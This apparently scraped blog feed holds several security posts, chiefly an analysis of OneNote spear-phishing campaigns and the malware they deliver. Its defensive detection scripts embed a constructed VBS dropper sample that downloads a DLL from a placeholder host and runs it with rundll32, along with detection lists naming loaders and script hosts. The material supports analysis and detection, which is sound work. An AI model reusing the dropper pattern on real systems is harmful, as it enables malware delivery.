  • Discrimination and inequality may further exacerbate existing problems, especially if technology is not designed with diversity, equity and inclusion in mind. Nevertheless, it is also possible that the metaverse offers new opportunities for people to connect, collaborate and learn from each other, regardless of their background or identity.

Most significant potential impacts of the metaverse

The impact of technological and cyber risks in the metaverse can be significant and far-reaching. Here are some of the potential impacts:

  • Loss of privacy and data security: If personal data is compromised, it could lead to identity theft, financial fraud, and other malicious activities. This could have serious consequences for both individuals and businesses.
  • Financial losses: Cyber-attacks that result in the theft of assets or virtual currencies could lead to significant financial losses for individuals and businesses operating in the metaverse.
  • Reputational damage: If a company’s or individual’s virtual presence is hacked or compromised, it could lead to reputational damage and loss of trust among its followers and customers.
  • Health problems: Addiction to the metaverse and overuse of virtual reality technology could lead to physical and mental health problems, such as eyestrain, headaches, and social isolation.
  • Limiting innovation and creativity: If the metaverse becomes centralised and controlled by a few powerful entities, it could limit innovation and creativity, stifling the potential of the virtual world.

The impacts of technological and cyber risks in the metaverse could be significant and require proactive measures to address and prevent these risks. As the metaverse becomes more pervasive, it will be essential to implement robust security protocols and regulations to ensure a safe and positive experience for all users.

Mitigating risks and minimising their impact

As experts highlight, these risks can affect not only individuals, but also businesses, governments, and society as a whole.

Among the potential impacts of technological and cyber risks in the metaverse are, in addition to those already mentioned, also identity theft, cyberbullying and exposure to harmful content.

These risks can also lead to a lack of trust in the metaverse and hinder its adoption and growth.

Photo: Billetto Editorial / Unsplash

The interconnected nature of the metaverse can also amplify the impact of cyber-attacks, potentially affecting multiple users and platforms simultaneously. Also, the complexity of the technological infrastructure of the metaverse and the rapid pace of innovation and development may pose significant new challenges for Cyber Security.

Conclusion

Hence, to mitigate these risks and minimise their potential impact, organisations and individuals must take proactive steps to ensure the security and privacy of their data and interactions in the metaverse. This includes implementing robust cyber security measures, promoting digital literacy and awareness, and adopting ethical and responsible practices.

The impact of technological and cyber risks in the metaverse therefore highlights the importance of prioritising Cyber Security and privacy in the development and use of virtual environments.

Featured photo: Stem. T4L / Unsplash.

Evolution of Spear-Phishing Techniques of Notorious Threat Groups and malware used

Aarón Jornet    17 April, 2023

In recent years, campaigns and threats of very different kinds have matured, yet their entry vector has remained the same: e-mail. This initial access is always the one that seems most trivial, the one that supposedly needs no attention because the company has already made its employees aware of it.

The trend shows exactly the opposite: many criminal groups and APTs keep using this technique, varying or evolving its form, and continue to exploit the most vulnerable element, human error.

Phishing, a social engineering technique used for initial access since the mid-1990s, is simply a tool for deceiving the victim into handing over confidential information: the e-mail is dressed up with fraudulent messages that seem familiar to the victim and are, in most cases, hard to distinguish at first glance from the legitimate mail the attackers are imitating.

Hand in hand with this technique comes Spear-Phishing, which in the MITRE ATT&CK framework has several sub-techniques (T1566.001 Spearphishing Attachment, T1566.002 Spearphishing Link and T1566.003 Spearphishing via Service). Each of them uses the fraudulent e-mail to get the victim to open a link, an attached document, etc.

How have attackers used these techniques over the years?

The evolution of techniques such as Spear-Phishing has been shaped by the way the groups that rely on them have used them.

A representative diagram of how the method of action has been refined, bearing in mind that the techniques are not linear and that all of them have been used over the years, would be as follows:

It is worth stressing again how varied and how durable these techniques have been over the years: they provide the initial access to an infrastructure, on which the rest of the attack is later deployed.

It’s not so bad, is it?

This question is asked more often than not before an incident happens. Are there "less" dangerous groups using Spear-Phishing as their initial weapon? Yes. Are there criminal groups and APTs using it? Also yes.

We find a large number of incidents that begin with this seemingly simple mechanism but which then go through the different phases used by organised groups:

During these phases, depending on the actor, the intruder may try to discover more computers on the network, move laterally and replicate the execution of the malware on other devices, so as to obtain as much information as possible from the infrastructure and later sell the data obtained or simply exploit it for strategic purposes.

Alternatively, the campaign may belong to a different kind of group, and therefore to a different attack structure, whose aim is to gather as much information as possible about the infrastructure in order to pivot to a domain controller and deploy ransomware. A ransom is then demanded for the affected files under threat of publishing all the data obtained, and the extortion may even be extended to the providers or companies that act as intermediaries for the victim.

What are the new techniques and who uses them?

As we mentioned in the previous point, Spear-Phishing continues to evolve while still using the same techniques as always. In recent weeks we have seen a large number of campaigns using OneNote files for this purpose.

The malware families that have been seen using this methodology are as follows:

  • Emotet | Heodo
  • Qbot | QakBot
  • AsyncRAT
  • Remcos
  • IcedID

These families are used by various criminal groups, as well as by APTs that target specific companies according to their particular interests.

A summary of how each of them is used, with their functionalities, would be as follows:

How do these new techniques work?

First, the group tries to reach the weakest link through e-mail, as mentioned above, and get us to download the attachment, which in this case is a OneNote file.

Searching for Spear-Phishing files using OneNote:

As mentioned, depending on the campaign, OneNote files or documents such as Excel or Word with macros, links, etc. may be used. Depending on the attacking group and the victim, the campaigns will be more or less targeted and sophisticated.

In this search we can also find this type of Spear-Phishing.

The origin of these e-mails is often decentralised: they can come from the mail servers of compromised organisations or even from botnets.

Attackers usually route through different proxies to avoid revealing their location; however, we can sometimes identify where these actors operate from.

The e-mail, as usual, will try to get you to download the attachment or open the link by citing an urgent or administrative matter.

After this, depending on the version, we obtain a OneNote file that tries to get us to click a fake banner in order to access the content. The result is the execution of the malware.

In this case, beneath the panel, which is just an image, there is an execution via VBS, but depending on the OneNote file it could be another type of script (JS, HTA...), a link that downloads the next stage, etc. By dragging the image aside it is easy to reach the script that is actually going to be executed behind it:

As we had mentioned, images are used to make the victim click the button, which is really a simple PNG that has the real button underneath it, in this case:

The most interesting element is the embedded object, which is not static and may differ from sample to sample: it usually contains the script that performs a download and then launches an execution, or directly a more obfuscated script that carries the binary to be executed later.
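Dragging the image aside works in the OneNote client, but an analyst triaging many samples wants the embedded object out of the file without opening it. The following is an added example, not code from the original article: it carves the files embedded in a .one section by walking the FileDataStoreObject structures documented in the public [MS-ONE] specification (header GUID, 64-bit length, padding, file bytes, footer GUID) and classifies what it finds. The sample section bytes, the decoy PNG and the VBS dropper inside them are constructed for the demo; the download domain is a placeholder.

```python
"""Carve files embedded in a OneNote (.one) section: the script that sits
behind the fake "Open" image, as described above, without opening the file.

Added example, not code from the original article. OneNote stores each
embedded file in a FileDataStoreObject whose layout, per the public
[MS-ONE] specification, is a 16-byte header GUID, an 8-byte little-endian
length, 4 unused bytes, 8 reserved bytes, the file bytes and a 16-byte
footer GUID. The sample .one bytes and the dropper inside them are
constructed here; the download domain is a placeholder.
"""
import re
import struct
import uuid
from dataclasses import dataclass
from typing import List

HEADER_GUID = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FOOTER_GUID = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
HEADER_LEN = 16 + 8 + 4 + 8

MAGIC = {b"MZ": "pe", b"\x89PNG": "png", b"%PDF": "pdf"}
SCRIPT_HINTS = (
    ("vbs", re.compile(rb"(?i)\bCreateObject\s*\(|\bWScript\.")),
    ("js", re.compile(rb"(?i)\bActiveXObject\b")),
    ("hta", re.compile(rb"(?i)<hta:application|<script\b")),
    ("bat", re.compile(rb"(?im)^@echo off|\bcmd\.exe\b|\bpowershell\b")),
)
SUSPICIOUS = {"pe", "vbs", "js", "hta", "bat"}


@dataclass
class Embedded:
    offset: int      # where the FileDataStoreObject starts in the section
    size: int        # cbLength from the header
    kind: str        # classification of the carved bytes
    data: bytes
    suspicious: bool


def classify(data: bytes) -> str:
    """Magic bytes first, then script keywords; 'unknown' otherwise."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    for kind, pattern in SCRIPT_HINTS:
        if pattern.search(data):
            return kind
    return "unknown"


def carve(blob: bytes) -> List[Embedded]:
    """Return every well-formed FileDataStoreObject in blob, in file order."""
    found = []
    pos = blob.find(HEADER_GUID)
    while pos != -1:
        if pos + HEADER_LEN <= len(blob):
            (length,) = struct.unpack_from("<Q", blob, pos + 16)
            start, end = pos + HEADER_LEN, pos + HEADER_LEN + length
            # Trust cbLength only if the footer GUID sits exactly where it says.
            if blob[end:end + 16] == FOOTER_GUID:
                data = blob[start:end]
                kind = classify(data)
                found.append(Embedded(pos, length, kind, data, kind in SUSPICIOUS))
        pos = blob.find(HEADER_GUID, pos + 1)
    return found


def build_object(data: bytes) -> bytes:
    """Wrap data in a FileDataStoreObject; used only to build the sample."""
    return HEADER_GUID + struct.pack("<Q", len(data)) + b"\0" * 12 + data + FOOTER_GUID


# Constructed sample: the decoy PNG "button" and a VBS dropper of the kind
# seen in the OneNote campaigns (downloads a DLL, runs it via rundll32).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\0" * 32
SAMPLE_VBS = (b'Set h = CreateObject("MSXML2.XMLHTTP")\r\n'
              b'h.Open "GET", "http://example.invalid/x.dll", False\r\n'
              b'CreateObject("WScript.Shell").Run "rundll32 x.dll,Start"\r\n')
SAMPLE_ONE = (b"\0" * 64 + build_object(SAMPLE_PNG)
              + b"\0" * 128 + build_object(SAMPLE_VBS) + b"\0" * 16)

if __name__ == "__main__":
    for obj in carve(SAMPLE_ONE):
        print(f"offset={obj.offset} size={obj.size} kind={obj.kind} "
              f"{'SUSPICIOUS' if obj.suspicious else 'ok'}")
```

The footer check matters: the length field is attacker-controlled bytes, so an object is only accepted when the footer GUID is found exactly where the header's length says it should be, which rejects truncated or deliberately malformed objects instead of slicing garbage out of the file.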

After extraction we find different scripts of very different sizes.

This depends on their level of obfuscation, on whether they embed a binary to be executed later, etc.

The simplest example is a script that downloads a payload from a malicious domain and then executes it; in this case the payload is a DLL that is launched via rundll32.exe.

At execution time the most common pattern is OneNote (onenote.exe) running a script host (wscript.exe) that in turn launches rundll32.exe or regsvr32.exe.

But with so many groups and campaigns abusing OneNote, the process trees we have found most interesting after analysing different campaigns are the following:

It is worth noting that in some malware families, such as AsyncRAT, the payload sometimes carries a double extension. This works because in many corporate environments users' file extensions are hidden by default, so the file appears to be a harmless document or script. We can therefore find names such as:

  • <file>.bat.exe
  • <file>.pdf.exe
  • <file>.vbs.exe
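Both signals described above, the OneNote process chain (onenote.exe spawning a script host that then runs rundll32.exe or regsvr32.exe) and the double-extension file names, can be hunted in process-creation telemetry. The following is an added example, not code from the original article: it reads JSON lines shaped like Sysmon Event ID 1 (the field names follow Sysmon; the paths, GUIDs and command lines are constructed for the demo), rebuilds each process's ancestry and emits an alert per matching rule. A benign rundll32.exe started by svchost.exe is included to show it does not alert.

```python
"""Hunt, over process-creation telemetry, for the two signals discussed
above: a OneNote process spawning a script host that then runs
rundll32.exe or regsvr32.exe, and payloads with a decoy double extension.

Added example, not code from the original article. The events below are
constructed JSON lines shaped like Sysmon Event ID 1 (field names follow
Sysmon; paths, GUIDs and command lines are invented for the demo).
"""
import json
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
LOLBIN_LOADERS = {"rundll32.exe", "regsvr32.exe"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".bat", ".vbs", ".txt", ".jpg", ".png"}
EXEC_EXTS = {".exe", ".scr", ".com"}


def basename(path: str) -> str:
    # ntpath handles backslash paths on any host OS.
    return ntpath.basename(path).lower()


def double_extension(path: str) -> bool:
    """True for names like Report.pdf.exe that rely on hidden extensions."""
    root, last = ntpath.splitext(basename(path))
    _, inner = ntpath.splitext(root)
    return last in EXEC_EXTS and inner in DECOY_EXTS


def ancestry(event: dict, by_guid: dict):
    """Yield the image basename of each ancestor, parent first."""
    guid = event.get("ParentProcessGuid")
    seen = set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        parent = by_guid[guid]
        yield basename(parent["Image"])
        guid = parent.get("ParentProcessGuid")


def detect(lines):
    """Return (rule, ProcessGuid) pairs for every event that matches a rule."""
    events = [json.loads(line) for line in lines if line.strip()]
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        image = basename(e["Image"])
        parent = basename(e.get("ParentImage", ""))
        chain = list(ancestry(e, by_guid))
        if image in SCRIPT_HOSTS and parent == "onenote.exe":
            alerts.append(("onenote_script_host", e["ProcessGuid"]))
        # Walk the whole chain: the loader is usually a grandchild of OneNote.
        if image in LOLBIN_LOADERS and "onenote.exe" in chain:
            alerts.append(("onenote_lolbin_chain", e["ProcessGuid"]))
        if double_extension(e["Image"]):
            alerts.append(("double_extension", e["ProcessGuid"]))
    return alerts


# Constructed telemetry: one OneNote chain, one double-extension drop and
# one benign rundll32 launched by svchost.exe that must not alert.
_EVENTS = [
    {"ProcessGuid": "E", "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"ProcessGuid": "O", "ParentProcessGuid": "E",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'ONENOTE.EXE "C:\Users\alice\Downloads\Invoice.one"'},
    {"ProcessGuid": "W", "ParentProcessGuid": "O",
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\AppData\Local\Temp\OneNote\16.0\NT\0\Open.vbs"'},
    {"ProcessGuid": "R", "ParentProcessGuid": "W",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dll,Start"},
    {"ProcessGuid": "D", "ParentProcessGuid": "E",
     "Image": r"C:\Users\alice\Downloads\Report.pdf.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "Report.pdf.exe"},
    {"ProcessGuid": "S", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"ProcessGuid": "L", "ParentProcessGuid": "S",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]
SAMPLE_LINES = [json.dumps(e) for e in _EVENTS]

if __name__ == "__main__":
    for rule, guid in detect(SAMPLE_LINES):
        print(f"{rule}: ProcessGuid={guid}")
```

The loader rule walks the full ancestry rather than checking only the direct parent, because in these campaigns rundll32.exe or regsvr32.exe is typically the grandchild of OneNote (via wscript.exe), and some variants add cmd.exe or powershell.exe in between.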

By this point the malware has already been downloaded and executed in one of the ways discussed above. So far we have only covered the Spear-Phishing technique and how it works in a real environment; the pattern coincides in most cases, with some phases alternating depending on the group exploiting it.

However, what techniques and objectives does the actor behind the campaign pursue with the malware used afterwards? The answer varies depending on who is behind the campaign, the sector the victim belongs to, the malware chosen for the purpose, etc.

As mentioned above, many malware families have been involved in the steps that follow this Spear-Phishing trend, so we will try to summarise the role of each of them in order to understand the impact they can have on an infrastructure.

Qbot | QakBot

Qbot is malware that has passed through several categories over time, such as banker, stealer and backdoor. Its basic function is to obtain sensitive information from the victim and then exfiltrate it.

Different actors have used Qbot, such as the criminal group EvilCorp, better known for its use of Dridex, or GoldCabin, another criminal group linked to several well-known malware families such as BokBot (IcedID), which also fits in with the phishing trends we have seen.

The operation of the new versions of Qbot can be summarised as follows:

  • After the Spear-Phishing discussed in the previous sections, a DLL is downloaded or executed directly via regsvr32.exe or rundll32.exe.
  • Once executed, Qbot usually injects itself into a legitimate process; in this campaign wermgr.exe is being widely used, since hiding under a process that is common in any infrastructure gives it greater stealth.
  • The injection usually observed is process hollowing: wermgr.exe is created in a suspended state, memory is reserved in that process and the desired code is written into it.
  • After this it persists through the well-known CurrentVersion\Run registry keys or through scheduled tasks. It also creates additional registry keys that store campaign data hardcoded in the sample; these usually include the location of the malicious DLL launched in the previous stage:
  • It can then connect outwards and send sensitive victim information to the C&C.

Emotet | Heodo

Emotet is malware that has also evolved over time and has been put to diverse uses. It has mainly been used as a banker, as a downloader and as a botnet.

In recent years it has gained various anti-analysis capabilities and has features for gathering information and spreading to other computers within reach in order to grow its botnet. It is commonly used by the group known as Mummy Spider or TA542, a criminal group that operates through campaigns, usually phishing-based.

Over the years its operators have refined and updated this well-known malware, and have worked alongside other known malware operations such as BokBot (IcedID), Trickbot, Dridex and the aforementioned Qbot.

The operation of the new versions of Emotet can be summarised as follows:

  • After the Spear-Phishing discussed in the previous sections, a DLL is downloaded or executed directly via regsvr32.exe or rundll32.exe.
  • This DLL has capabilities to evade analysis and is sometimes difficult or impossible to analyse in a sandbox or with a debugger, owing to its anti-analysis techniques:
  • It usually establishes persistence by copying the same DLL, under a different name, into a folder under \Local\ (the user's local application data) and adding it to the registry key:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • After these phases Emotet can establish communication with the C&C and receive instructions or operate from this position, where it already has persistence and copies of the malware in other locations. It can also try to copy files to, or execute itself on, other devices or disks within its reach:

Emotet will try to obtain as much information as possible from the system or network in which it finds itself, in order to further grow its botnet.
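The persistence described for both Qbot and Emotet above comes down to the same artefact: a Run-key value that launches a DLL from a user-writable directory through rundll32.exe or regsvr32.exe. The following is an added example, not code from the original article, that audits such entries. The value names, commands and environment variables are constructed; on a real host they would be read from HKLM and HKCU ...\CurrentVersion\Run (via winreg or a reg.exe export), and the signer of any flagged file would be checked before raising an incident.

```python
"""Audit Run-key autostart entries for the persistence pattern shared by
Qbot and Emotet above: a DLL dropped under the user's profile and
registered in ...\CurrentVersion\Run behind rundll32.exe or regsvr32.exe.

Added example, not code from the original article. The entries and the
environment are constructed; on a real host they would be read from
HKLM/HKCU ...\CurrentVersion\Run (winreg or a reg.exe export) and the
signer of each flagged file checked before raising an incident.
"""
import ntpath
import re

TOKEN = re.compile(r'"([^"]*)"|(\S+)')
LOADERS = {"rundll32.exe", "regsvr32.exe"}
# Directories an unprivileged user can write to, as lowercase path fragments.
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\",
                 "\\programdata\\", "\\users\\public\\")


def tokens(cmd: str) -> list:
    """Split a Windows command line, keeping quoted paths intact."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmd)]


def expand(path: str, env: dict) -> str:
    """Expand %VAR% references using the supplied environment."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def user_writable(path: str) -> bool:
    low = path.lower()
    return any(frag in low for frag in USER_WRITABLE)


def audit_entry(name: str, cmd: str, env: dict):
    """Return a finding dict for one Run-key value, or None if it looks clean."""
    toks = tokens(cmd)
    if not toks:
        return None
    exe_path = expand(toks[0], env)
    exe = ntpath.basename(exe_path).lower()
    if exe in LOADERS:
        # rundll32 takes "dll,Export"; regsvr32 takes [/s] dll. Skip switches.
        args = [t for t in toks[1:] if not t.startswith("/")]
        if not args:
            return None
        target = expand(args[0].split(",")[0], env)
        reason = "loader_dll_in_user_writable_path"
    else:
        target = exe_path
        reason = "exe_in_user_writable_path"
    if user_writable(target):
        return {"name": name, "image": exe, "target": target, "reason": reason}
    return None


def audit(entries, env):
    """entries: iterable of (value name, command) pairs from a Run key."""
    results = []
    for name, cmd in entries:
        hit = audit_entry(name, cmd, env)
        if hit:
            results.append(hit)
    return results


ENV = {"LOCALAPPDATA": r"C:\Users\alice\AppData\Local",
       "APPDATA": r"C:\Users\alice\AppData\Roaming",
       "PROGRAMFILES": r"C:\Program Files"}
ENTRIES = [
    ("SecurityHealth", r"%ProgramFiles%\Windows Defender\MSASCuiL.exe"),
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Jrgwsk", r'regsvr32.exe /s "%LOCALAPPDATA%\Jrgwsk\ghwxbs.dll"'),                        # Emotet-style
    ("yslp", r"rundll32.exe C:\Users\alice\AppData\Roaming\Microsoft\Tmdiq\tmdiq.dll,Motd"),  # Qbot-style
    ("Java", r"C:\Program Files\Java\jre\bin\jusched.exe"),
]

if __name__ == "__main__":
    for hit in audit(ENTRIES, ENV):
        print(f"{hit['name']}: {hit['reason']} -> {hit['target']}")
```

The OneDrive entry is flagged on purpose: legitimate per-user installers also live under AppData\Local, so the rule is a triage filter, not a verdict. The two loader hits are the ones that match the Qbot and Emotet pattern exactly (a DLL with a random name under the user's profile), and those are the entries to pull the file from and check its signature and export table.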

AsyncRAT and Remcos

AsyncRAT and Remcos, on the other hand, are two malware families that have also evolved over time and have different uses.

Both are remote access Trojans (RATs) that allow the attacker to take control of an infected system and perform various malicious actions, such as stealing information, installing additional malware or controlling the system remotely.

Their initial access methods are similar: both frequently abuse phishing and are among the new OneNote abuse trends.

The groups that have used AsyncRAT are very diverse, usually focused on information theft and espionage, and originate from different locations. Groups such as Vendetta (Turkey), Earth Berberoka (China) or APT-C-36 (Colombia) have used this type of RAT to a greater or lesser extent in their history.

The groups that have used Remcos are also varied, with purposes similar to those of AsyncRAT users, and sometimes coincide, as is the case of APT-C-36 or Vendetta. Remcos is also used by other groups such as Gorgon Group (Pakistan) or APT33 (Iran).

The functioning of the new versions of these two RATs can be summarised as follows:

  • After the Spear-Phishing discussed in the previous sections, execution is obtained, usually through a download or by running a script or command.
  • After this initial phase, the file is either launched from a temporary folder or copied elsewhere so that its payload can be started. RATs usually perform, at some point in their execution, an injection into a legitimate process, frequently one related to .NET: AsyncRAT itself is written in .NET (C#), and Remcos, although a native binary, is often delivered through .NET loaders.
  • Depending on the version and on who is using it, it adds anti-analysis techniques to prevent the sample from being debugged or run in a sandbox, which makes the analyst's work more difficult.
  • As is usual in this type of malware, it creates scheduled tasks or registry entries to persist on the system, so that even if the computer is shut down the process restarts in order to maintain communication with the C&C.
  • After this, it communicates outwards, sending basic information about the infected computer, and waits for the attacker's orders.

Conclusion

These Spear-Phishing techniques will keep evolving, and all their variants will remain in use, because all of them are still effective: the human factor is always the weakest link, and the groups that use these techniques know it.

As mentioned, these are not just disorganised teams; in many cases they are orchestrated actors who use malware with a great capacity to gather information on infrastructure, users and credentials, and who can expose an entire organisation through the same entry point, a simple e-mail.

Featured photo: Brett Jordan / Unsplash

Cyber Security Weekly Briefing, 8 – 14 April

Telefónica Tech    14 April, 2023

Apple fixes two new actively exploited 0-day vulnerabilities

Apple has released new security advisories about two new actively exploited 0-day vulnerabilities affecting iPhones, Macs and iPads.

  • The first, registered as CVE-2023-28206, is an out-of-bounds write in IOSurfaceAccelerator that could lead to data corruption, a crash or code execution.
  • The second, assigned CVE-2023-28205, is a use-after-free in WebKit: a specially crafted malicious web page controlled by threat actors could reuse freed memory to cause data corruption or arbitrary code execution.

Apple recommends updating affected devices to iOS 16.4.1, iPadOS 16.4.1, macOS Ventura 13.3.1 and Safari 16.4.1, which fix both 0-day vulnerabilities.

More info

* * *

Microsoft Patch Tuesday includes an actively exploited 0-day vulnerability

In its latest security update, Microsoft has fixed a total of 98 vulnerabilities affecting several of its products, including Microsoft Windows, Office and Edge.

These include an actively exploited 0-day vulnerability registered as CVE-2023-28252, with a CVSSv3 score of 7.8 according to the vendor. It is a flaw in the Common Log File System (CLFS) driver that could be exploited locally by malicious actors to obtain SYSTEM privileges.

The remaining critical security flaws, registered as CVE-2023-21554, CVE-2023-28231, CVE-2023-28219, CVE-2023-28220, CVE-2023-28250 and CVE-2023-28291, should also be mentioned.

Finally, CVE-2023-28285, CVE-2023-28295, CVE-2023-28287 and CVE-2023-28311, although less critical than the rest and not known to be actively exploited, are worth mentioning because they could easily be exploited by opening malicious documents sent in future phishing campaigns.

More info

* * *

QuaDream accused of supplying spyware used against political figures and journalists

Researchers from Citizen Lab and Microsoft's Threat Intelligence team have published an investigation into the Israeli company QuaDream, whose spyware they say has been used against journalists and political figures.

The company's activity is allegedly based on selling and distributing to government entities a platform called Reign, described by Microsoft as a set of exploits, malware and infrastructure designed to exfiltrate information from mobile devices.

Among the techniques used to deploy it, the researchers suspect a zero-click exploit for iOS devices, which they have named ENDOFDAYS, that makes use of invisible iCloud calendar invitations.

Analysis has identified at least five victims, who currently remain anonymous, in North America, Central Asia, Southeast Asia, Europe and the Middle East.

More info

* * *

Android security bulletin for April

Android has released its security bulletin for the month of April, which fixes a total of 68 vulnerabilities.

Among them, the most important are two detected in the System component, catalogued as CVE-2023-21085 and CVE-2023-21096, both of critical severity, which could allow an attacker to achieve remote code execution (RCE) without needing additional execution privileges.

In addition, four vulnerabilities in Qualcomm closed-source components have also been listed as critical: CVE-2022-33231, CVE-2022-33288, CVE-2022-33289 and CVE-2022-33302.

Finally, a vulnerability in the Arm Mali GPU kernel driver, CVE-2022-38181 (CVSSv3 8.8), has also been fixed; it is reported to have been actively exploited.

More info

* * *

Azure design flaw allows account takeover

An Orca Security investigation has exposed a design flaw in Azure Storage Shared Key authorisation that would allow an attacker to gain access to Microsoft Storage accounts. Orca published a proof of concept showing how an attacker could abuse it to steal access tokens from higher-privileged identities, move laterally, access critical business assets and achieve remote code execution (RCE). However, the Microsoft Security Response Center has classed the issue as a design flaw rather than a vulnerability, so no security update will be issued and a fix will have to wait for a redesign of the affected Azure feature.

In the meantime, it is recommended to disable Shared Key authorisation on storage accounts and adopt Azure Active Directory authentication instead as a mitigation.

More info

Edge AI: Artificial Intelligence outside Cloud

Nacho Palou    13 April, 2023

Edge AI refers to executing AI algorithms on or near devices such as wearables, mobile phones, cameras, IoT (Internet of Things) sensors or edge servers that have the ability to analyse and process data in real time, without depending on a server on the internet.

In contrast, using Artificial Intelligence in the Cloud (Cloud AI) requires sending data to a data centre or Cloud platform where it is stored and processed. It usually requires a permanent, robust and high-capacity connection.

Edge AI is therefore closely related to Edge Computing. Both concepts refer to processing and analysing data at the edge of the network, that is, close to or even on the very devices that generate the data. With Edge AI, response times are shortened, and efficiency and security improve when Artificial Intelligence models are run on Edge devices.

Edge AI features

In order for Edge AI to be possible, analytical models and AI algorithms must be able to run on local servers or on devices equipped with processors with a certain computational capacity, as described in the article Edge Computing and Machine Learning, a strategic alliance.

However, Edge AI devices often have limitations in computing power, memory and data storage space, and also in autonomy if they run on batteries.

These limitations may require optimising the algorithms and, depending on their purpose, using specialised hardware:

  • Optimising algorithms by applying techniques such as reducing model complexity, quantizing parameters (representing weights and activations with fewer bits) or removing unnecessary connections in the neural network (pruning) to speed up inference, as well as using architectures designed specifically for low-power devices.
  • Specialised hardware that uses processors built for AI applications, such as computer vision and neural network inference processors. AI-focused ASIC (Application-Specific Integrated Circuit) chips, such as the IBM AIU processor, offer high performance and low latency compared to general-purpose processors or CPUs.
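To make the two model-optimisation techniques concrete, here is an added example, not code from the original article: symmetric 8-bit quantization of a weight matrix (one scale per tensor) and magnitude pruning of its connections, written in plain Python so that it runs without a deep-learning framework. The weight matrix and input vector are constructed; a real deployment applies the same operations layer by layer.

```python
"""The two model-optimisation techniques named above, worked on a small
weight matrix: symmetric 8-bit quantization of parameters and magnitude
pruning of connections.

Added example, not code from the original article. It is written in plain
Python so it runs without a deep-learning framework; the weights and input
are constructed, and a real deployment applies the same steps per layer.
"""
from typing import List, Tuple

Matrix = List[List[float]]


def quantize_int8(weights: Matrix) -> Tuple[List[List[int]], float]:
    """Map floats to int8 with one per-tensor scale (symmetric scheme).
    Returns the integer matrix and the scale needed to undo it."""
    max_abs = max(abs(w) for row in weights for w in row) or 1.0
    scale = max_abs / 127.0
    q = [[max(-127, min(127, round(w / scale))) for w in row] for row in weights]
    return q, scale


def dequantize(q: List[List[int]], scale: float) -> Matrix:
    return [[v * scale for v in row] for row in q]


def prune_by_magnitude(weights: Matrix, fraction: float) -> Matrix:
    """Zero the given fraction of weights with the smallest magnitude."""
    flat = sorted(abs(w) for row in weights for w in row)
    k = int(len(flat) * fraction)
    if k == 0:
        return [row[:] for row in weights]
    threshold = flat[k - 1]
    return [[0.0 if abs(w) <= threshold else w for w in row] for row in weights]


def sparsity(weights: Matrix) -> float:
    total = sum(len(row) for row in weights)
    return sum(1 for row in weights for w in row if w == 0.0) / total


def max_abs_error(a: Matrix, b: Matrix) -> float:
    return max(abs(x - y) for ra, rb in zip(a, b) for x, y in zip(ra, rb))


def matvec(weights: Matrix, x: List[float]) -> List[float]:
    return [sum(w * xi for w, xi in zip(row, x)) for row in weights]


def storage_bytes(weights: Matrix, bits: int) -> int:
    """Bytes needed to store the tensor at the given parameter width."""
    return sum(len(row) for row in weights) * bits // 8


# Constructed 3x4 weight matrix and input vector.
SAMPLE_W = [[0.51, -0.03, 0.22, 0.08],
            [-0.47, 0.15, -0.01, 0.33],
            [0.09, -0.28, 0.41, -0.12]]
SAMPLE_X = [1.0, -2.0, 0.5, 3.0]

if __name__ == "__main__":
    q, scale = quantize_int8(SAMPLE_W)
    print("int8 round-trip max error:", max_abs_error(SAMPLE_W, dequantize(q, scale)))
    print("bytes fp32 -> int8:", storage_bytes(SAMPLE_W, 32), "->", storage_bytes(SAMPLE_W, 8))
    pruned = prune_by_magnitude(SAMPLE_W, 0.5)
    print("sparsity after pruning:", sparsity(pruned))
    drift = max(abs(a - b) for a, b in zip(matvec(SAMPLE_W, SAMPLE_X), matvec(pruned, SAMPLE_X)))
    print("output drift from pruning:", drift)
```

The quantization error is bounded by half the scale (the largest weight sets the scale, so one outlier weight makes every other weight coarser, which is why per-channel scales are used in practice), and the storage shrinks fourfold from 32-bit to 8-bit. Pruning trades accuracy for sparsity that inference hardware can skip; the drift printed at the end is the price paid on this input.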

Security is also a critical aspect for Edge AI devices. Processing and analysing data on a local device reduces the risk of data exposure. But Edge AI devices are also vulnerable and equally exposed to cyber threats and attacks.

The use of Edge AI can also have privacy implications for users, depending on their function. Therefore, Edge AI must implement mechanisms for encryption, authentication, anomaly detection and privacy management.

Differences between Edge AI and Cloud AI

As mentioned above, the main difference between Cloud AI and Edge AI lies in where the algorithms run:

  • In Cloud AI, data storage and processing happen on conventional, centralised Cloud servers, often managed by a Cloud provider.
